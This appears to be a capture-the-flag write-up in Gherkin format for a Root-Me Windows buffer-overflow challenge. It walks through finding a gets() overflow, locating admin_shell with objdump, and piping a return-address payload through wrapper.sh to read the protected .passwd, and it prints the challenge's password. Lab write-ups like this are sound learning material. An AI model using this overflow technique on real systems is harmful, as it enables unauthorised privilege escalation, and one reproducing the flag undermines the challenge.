## Version 2.0
## language: en

Feature:
  Site:
    www.root-me.org
  Category:
    App system
  User:
    Alb4tr02
  Goal:
    Get a password from a restricted file

  Background:
  Hacker's software:
    | <Software name> | <Version>    |
    | Windows OS      | 10           |
    | Google Chrome   | 83.0.4103.106|

  Machine information:
    Given the challenge SSH credentials
    """
    host: challenge05.root-me.org
    port: 2225
    user: app-systeme-ch72
    pass: app-systeme-ch72
    """
    Then I am able to successfully log into the remote server trough webssh

  Scenario: Fail: Executing file with payload
    Given that I am connected to the server trough web shh
    And the console shows me some info
    """
    ----------------

    Welcome on challenge05    /

    -----------------------------‘

    /tmp and /var/tmp are writeable

    Validation password is stored in $HOME/.passwd

    Useful commands available:
    python, perl, gcc, netcat, cdb, radare2, powershell, cmd
    """
    When I execute the ls -la command I found the following files
    """
    total 121
    dr-xr-x---+ 1 root Users               0 Dec  3  2019 .
    drwx---r-x+ 1 root None                0 Dec  2  2019 ..
    -rw-r-----+ 1 root Administrators     33 Dec  3  2019 .passwd
    drwx------+ 1 root Users               0 Oct  6  2019 .ssh
    -rw-r-----  1 root Users             336 Dec  2  2019 ch72.c
    -rwxr-x---+ 1 root Users          105984 Dec  3  2019 ch72.exe
    -rwxr-x---  1 root Users            1550 Dec  3  2019 ch72.obj
    ----------+ 1 root None              175 Oct  5  2019 exploit.sh
    -rw-------+ 1 root None              233 Mar 27  2019 Makefile
    -rwxr-x---+ 1 root Users             135 Dec  3  2019 wrapper.sh
    """
    Then I tried to see the contents of the file .passwd
    And get a Permission denied error
    Then I tried to see the contents of the file ch72.c
    And see two functions, the main function and a function admin_shell
    Then I see that the main function calls the gets function
    Then I see that the buffer size is 16
    Then I execute the ch72.exe file
    And get the following output
    """
    python -c 'print "A"*16' | ./ch72.exe
    AAAAAAAAAAAAAAAA
    """
    And then I try to get a buffer overflow
    And get the following output
    """
    python -c 'print "A"*24' | ./ch72.exe
    AAAAAAAAAAAAAAAA
    Segmentation fault
    """
    Then I try to calculate the address of the admin_shell function
    And I execute the command objdump -d ch72.exe | less and get the following
    """
    ch72.exe:     file format pei-i386

    Disassembly of section .text:

    00401000 <.text>:
      401000:       55                      push   %ebp
      401001:       8b ec                   mov    %esp,%ebp
      401003:       68 00 b0 41 00          push   $0x41b000
      401008:       e8 bf 2b 00 00          call   0x403bcc
      40100d:       83 c4 04                add    $0x4,%esp
      401010:       5d                      pop    %ebp
      401011:       c3                      ret
      401012:       cc                      int3
      401013:       cc                      int3
      401014:       cc                      int3
      401015:       cc                      int3
      401016:       cc                      int3
      401017:       cc                      int3
      401018:       cc                      int3
      401019:       cc                      int3
      40101a:       cc                      int3
      40101b:       cc                      int3
      40101c:       cc                      int3
      40101d:       cc                      int3
      40101e:       cc                      int3
      40101f:       cc                      int3
      401020:       55                      push   %ebp
      401021:       8b ec                   mov    %esp,%ebp
      401023:       83 ec 14                sub    $0x14,%esp
      401026:       c6 45 ec 00             movb   $0x0,-0x14(%ebp)
      40102a:       33 c0                   xor    %eax,%eax
      40102c:       89 45 ed                mov    %eax,-0x13(%ebp)
      40102f:       89 45 f1                mov    %eax,-0xf(%ebp)
      401032:       89 45 f5                mov    %eax,-0xb(%ebp)
      401035:       66 89 45 f9             mov    %ax,-0x7(%ebp)
      401039:       88 45 fb                mov    %al,-0x5(%ebp)
      40103c:       8d 4d ec                lea    -0x14(%ebp),%ecx
    """
    Then I discover that the addres od the admin_shell function is 401000
    And the size of the buffer is 20 bytes
    Then I execute the ch72.exe file with the payload
    """
    python -c 'print "A"*24 +"\x00\x10\x40\x00"' | ./ch72.exe
    """
    And get the following output
    """
    C:\cygwin64\challenge\app-systeme\ch72>runas /savecred /profile /user:\
    Administrator whoami
    Attempting to start whoami as user "CHALLENGE05\Administrator" ...
    Enter the password for Administrator:
    Attempting to start whoami as user "CHALLENGE05\Administrator" ...
    RUNAS ERROR: Unable to run - whoami
    1326: The user name or password is incorrect.

    C:\cygwin64\challenge\app-systeme\ch72>dir
     Volume in drive C has no label.
     Volume Serial Number is 8AB6-D97C

     Directory of C:\cygwin64\challenge\app-systeme\ch72

    12/03/2019  03:06 PM    <DIR>          .
    12/03/2019  03:06 PM    <DIR>          ..
    12/03/2019  02:09 PM                33 .passwd
    10/06/2019  12:00 PM    <DIR>          .ssh
    12/02/2019  11:07 AM               336 ch72.c
    12/03/2019  03:09 PM           105,984 ch72.exe
    12/03/2019  03:09 PM             1,550 ch72.obj
    10/05/2019  12:19 PM               175 exploit.sh
    03/27/2019  03:37 PM               233 Makefile
    12/03/2019  02:50 PM               135 wrapper.sh
    7 File(s)        108,446 bytes
    3 Dir(s)      95,645,696 bytes free

    C:\cygwin64\challenge\app-systeme\ch72>cat .passwd
    cat: .passwd: Permission denied
    """
  Scenario: Success: Executing file with payload trough the wrapper
    Given the wrapper.sh file
    Then I realise that the wrapper can give the permissions that I need
    Then I excute the wrapper with the payload
    """
    python -c 'print "A"*24 + "\x00\x10\x40\x00"' | ./wrapper.sh
    """
    And get the following output
    """
    Microsoft Windows [Version 10.0.17763.737]
    (c) 2018 Microsoft Corporation. All rights reserved.

    C:\cygwin64\challenge\app-systeme\ch72>app-systeme-ch72@challenge05:~$
    """
    Then I redirect the payload to a tmp file
    And then I execute the wrapper again using cat command with dash to avoid
    Then closing of the cmd cat /tmp/payload - | ./wrapper.sh
    And I get the following output
    """
    Microsoft Windows [Version 10.0.17763.737]
    (c) 2018 Microsoft Corporation. All rights reserved.

    C:\cygwin64\challenge\app-systeme\ch72>
    """
    And the I execute the cat command to see the contents of the .passwd file
    And I get the password 466aa7907db65a182fe0cc97931388c7
    And finish the challenge
